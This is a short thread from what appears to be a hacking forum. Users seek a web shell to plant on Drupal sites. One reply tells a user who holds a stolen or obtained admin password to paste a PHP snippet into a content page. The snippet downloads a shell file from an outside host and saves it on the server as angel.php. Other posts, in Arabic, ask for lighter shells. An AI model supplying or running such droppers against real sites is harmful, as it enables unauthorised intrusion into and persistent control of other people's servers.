I need to shell upload Drupal (1 Viewer)

Joined
Jan 19, 2017
Credits
0
Rating - 0%
I need to shell upload Drupal
اريد شل لارفع على سكربت دوربال لان معضم الشلات لم تنجح
 
Joined
Dec 1, 2015
Credits
201,695
Rating - 95.2%
you get admin password ? or not yet ? if you take password

add content page in admin panel

put it this code

PHP:
<?php
$file = file_get_contents('http://w0rms.com/shell/angel.txt');
$b = fopen('angel.php', 'w');
fwrite($b,$file);
fclose($b);
print 'Başarılı ! &lt;a href=angel.php&gt;&lt;/a&gt;';
?>

work preview mode
 
Joined
Feb 23, 2017
Credits
0
Rating - 0%
انا تاني لقيت نفس المشكل لازم شل خفيف بزاف
كي تلقى شل قلي صهيب
 

Users who are viewing this thread

Top